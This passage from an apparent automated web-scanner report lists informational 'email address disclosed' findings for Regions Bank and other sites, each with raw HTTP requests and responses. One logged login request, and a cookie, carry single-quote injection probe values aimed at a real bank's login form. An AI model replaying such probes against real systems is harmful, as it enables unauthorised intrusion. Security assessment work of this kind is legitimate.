function VAM_EvalDiffCond(pCO)
{
var vVal1 = pCO.ConvVal(pCO, p
...[SNIP]...
14.7. https://securebank.regions.com/VAM/2_0_2/VAM_DTTB.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /VAM/2_0_2/VAM_DTTB.js

Issue detail

The following email address was disclosed in the response:

Request

GET /VAM/2_0_2/VAM_DTTB.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555424020:ss=1305555424020; securebank.regions.com-https=R929786393

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT
Accept-Ranges: bytes
ETag: "08a854a4d9c61:f627"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT
Content-Length: 5948

// Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com
// Professional Validation And More v2.0.2 Level 2


function VAM_ReformatInit(pAO)
{
var vFld = VAM_GetById(pAO.Con
...[SNIP]...
14.8. https://securebank.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555427736:ss=1305555424020; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: no-cache
Content-Length: 3262
Content-Type: image/x-icon
Last-Modified: Fri, 28 Sep 2007 03:41:18 GMT
Accept-Ranges: bytes
ETag: "e0921d6e811c81:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:20:22 GMT

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...
14.9. https://securebank.regions.com/images/btnContinue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/btnContinue.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /images/btnContinue.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R929786393; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555427736:ss=1305555424020

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Length: 1026
Content-Type: image/gif
Last-Modified: Mon, 19 Feb 2007 12:52:50 GMT
Accept-Ranges: bytes
ETag: "03d9adc2454c71:f627"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:09 GMT

GIF89aF......U..U.....V....g9V.U..j.$U..7W.U..9V.V........S..U..W....ET..X..6V.u.59W.V..T..8X....:W....6X...V6X.9V.......7W.^..7Y.5W....8Y....W..W..S..U..T..7X.......S..T..7V.8U.R..T..6X.Q..T..8S....S
...[SNIP]...
14.10. https://securebank.regions.com/images/equalhousing.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/equalhousing.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /images/equalhousing.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Length: 282
Content-Type: image/gif
Last-Modified: Fri, 15 Sep 2006 20:19:50 GMT
Accept-Ranges: bytes
ETag: "0b7b64b4d9c61:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT

GIF89a...........//.........kjjTr.VUU......GGG.........+Gt>>=......EQf............. B...{...........&%#`n....!.......,............'.di."..,.e...%0...,.......P0*.......    E.1.%..D.$ ....blK.
...s.%.
.#..
...[SNIP]...
14.11. https://securebank.regions.com/images/green/rf_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/green/rf_logo.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /images/green/rf_logo.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Length: 4105
Content-Type: image/gif
Last-Modified: Wed, 13 Aug 2008 19:18:20 GMT
Accept-Ranges: bytes
ETag: "0e6a25879fdc81:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:05 GMT

GIF89a).8.......U..............U.................V.....W.......r....................}.....w........u......r..........A....>...i.............}_...................{.;...~.?......^....................
...[SNIP]...
14.12. https://securebank.regions.com/images/red_arrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/red_arrow.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /images/red_arrow.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R929786393; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555427736:ss=1305555424020

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Length: 54
Content-Type: image/gif
Last-Modified: Wed, 14 Feb 2007 14:50:26 GMT
Accept-Ranges: bytes
ETag: "0a53d764750c71:f627"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:09 GMT

GIF89a........U....!.......,...........a.........p..;
14.13. https://securebank.regions.com/images/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/spacer.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /images/spacer.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Length: 799
Content-Type: image/gif
Last-Modified: Fri, 15 Sep 2006 20:19:50 GMT
Accept-Ranges: bytes
ETag: "0b7b64b4d9c61:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT

GIF89a..................................................................................................................................................................................................
...[SNIP]...
14.14. https://securebank.regions.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /login.aspx

Issue detail

The following email address was disclosed in the response:

Request

POST /login.aspx?brand=regions HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Cache-Control: max-age=0
Origin: https://www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 110

ignore=&locationZipCode=ZIP+Code&locationCity=City&locationState=State&googleSearch=&OnlineID=%27&Password=%27

Response

HTTP/1.1 301 Moved
Set-Cookie: securebank.regions.com-https=R812380214; path=/
Date: Mon, 16 May 2011 15:20:12 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
Set-Cookie: ASP.NET_SessionId=hndv2y55u1otew45h3eaarf0; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html
Content-Length: 0

14.15. https://securebank.regions.com/script/regions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /script/regions.js

Issue detail

The following email address was disclosed in the response:

Request

GET /script/regions.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rxyjhw55ndvthz45fybes045; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Oct 2010 15:22:00 GMT
Accept-Ranges: bytes
ETag: "01c578a6a70cb1:e57b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:00 GMT
Content-Length: 8556

/**********************************************************
* *
* Copyright .2005 Corillian Corporation *
*
...[SNIP]...
14.16. https://securebank.regions.com/styles/styles.AmSouth.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /styles/styles.AmSouth.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/styles.AmSouth.css HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rxyjhw55ndvthz45fybes045; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Sat, 26 Dec 2009 05:14:00 GMT
Accept-Ranges: bytes
ETag: "05c773bea85ca1:e57b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:00 GMT
Content-Length: 25437

BODY
{font-size:11px; font-family:Arial, Sans-Serif; color:black; margin:0px; border-collapse:collapse; text-align:left; padding:0px;}
.pageBackground
{background-image:url(../images/page_bck.gif);
...[SNIP]...
14.17. https://securebank.regions.com/styles/stylesprint.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /styles/stylesprint.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/stylesprint.css HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rxyjhw55ndvthz45fybes045; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Sat, 26 Dec 2009 05:14:00 GMT
Accept-Ranges: bytes
ETag: "05c773bea85ca1:e57b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:01 GMT
Content-Length: 32493

BODY
{font-size:11px; font-family:Arial, Sans-Serif; color:black; margin:0px; border-collapse:collapse; text-align:left; padding:0px;}
.pageBackground
{background-image:url(../images/page_bck.gif);
...[SNIP]...
14.18. http://www.google.com/uds/solutions/slideshow/gfslideshow.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /uds/solutions/slideshow/gfslideshow.js

Issue detail

The following email address was disclosed in the response:

Request

GET /uds/solutions/slideshow/gfslideshow.js HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=Lhm6ttn7an2-iBnzwND2ChEHpa2gcQrA0oxhn4qPKMBja0y3M9EooPWTFGVZE1WGhC0EeQbdhjodIci27iUTt4FJdl_w1CKKGajsRgpNHjVx0TFdmc2yQbpHgH6J9Zjt

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 05 May 2011 23:34:29 GMT
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 14:32:31 GMT
Expires: Mon, 16 May 2011 14:32:31 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 35793

/**
* Copyright (c) 2008 Google Inc.
*
* You are free to copy and use this sample.
* License can be found here: http://code.google.com/apis/ajaxsearch/faq/#license
*/

/**
* @fileoverview A slideshow control based on the AJAX Feed API.
* @author dcollison@google.com (Derek Collison)
*/

/**
* GFslideshow
* @param {String} photoFeed The feed URL.
* @param {String|Object} container Either the id string or the element itself.
* @param {Object} options Options m
...[SNIP]...
14.19. https://www.paperg.com/post.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The following email address was disclosed in the response:

Request

GET /post.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmb=27786045;

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 16:45:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<span id="msg_email">&nbsp;ex. young@jtmarlin.com </span>
...[SNIP]...
14.20. http://www.placelocal.com/css/ui.all.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.placelocal.com
Path:   /css/ui.all.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/ui.all.css HTTP/1.1
Host: www.placelocal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/forgot_password.php
Cookie: PHPSESSID=4d3oqoeopjg5os4f6kha7nto63

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 15:15:38 GMT
Content-Type: text/css
Connection: keep-alive
Last-Modified: Mon, 14 Mar 2011 06:31:32 GMT
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 15:15:38 GMT
Vary: Accept-Encoding
Content-Length: 20792

/*
* jQuery UI screen structure and presentation
* This CSS file was generated by ThemeRoller, a Filament Group Project for jQuery UI
* Author: Scott Jehl, scott@filamentgroup.com, http://www.filamentgroup.com
* Visit ThemeRoller.com
*/

/*
* Note: If your ThemeRoller settings have a font size set in ems, your components will scale according to their parent element's font siz
...[SNIP]...
14.21. http://www.placelocal.com/js/includes/jquery-ui-personalized.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.placelocal.com
Path:   /js/includes/jquery-ui-personalized.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/includes/jquery-ui-personalized.js HTTP/1.1
Host: www.placelocal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/forgot_password.php
Cookie: PHPSESSID=4d3oqoeopjg5os4f6kha7nto63

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 15:15:40 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Tue, 23 Nov 2010 10:19:52 GMT
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 15:15:40 GMT
Vary: Accept-Encoding
Content-Length: 75355

/*
* jQuery UI 1.5.3
* Contains Datepicker
*
* Copyright (c) 2008 Paul Bakaus (ui.jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://
...[SNIP]...
08 Marc Grabanski
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Datepicker
*
* Depends:
*    ui.core.js
*
* Marc Grabanski (m@marcgrabanski.com) and Keith Wood (kbwood@virginbroadband.com.au).
*/

(function($) { // hide the namespace

var PROP_NAME = 'datepicker';

/* Date picker manager.
Use the singleton instance of this class, $.datepicker, to interact with the date picker.
S
...[SNIP]...
14.22. http://www.regions.com/about_regions/email_fraud.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /about_regions/email_fraud.rf

Issue detail

The following email address was disclosed in the response:

Request

GET /about_regions/email_fraud.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/protecting_self_online.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557307425:ss=1305556924172

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:48:51 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 20870


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<a href="mailto:phishing@regions.com"><strong>phishing@regions.com</strong>
...[SNIP]...
14.23. http://www.regions.com/about_regions/report_fraud.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /about_regions/report_fraud.rf

Issue detail

The following email address was disclosed in the response:

Request

GET /about_regions/report_fraud.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/privacy_security.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557010832:ss=1305556924172

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:43:40 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 25489


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<a href="mailto:phishing@regions.com">phishing@regions.com</a>
...[SNIP]...
14.24. http://www.regions.com/personal_banking/online_security.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /personal_banking/online_security.rf

Issue detail

The following email address was disclosed in the response:

Request

GET /personal_banking/online_security.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555412882:ss=1305555382886; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTP=R825062118; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:20:18 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 22388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<a href="mailto:phishing@regions.com">phishing@regions.com</a>
...[SNIP]...
15. Private IP addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cigna.com
Path:   /js/hplogin.js

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

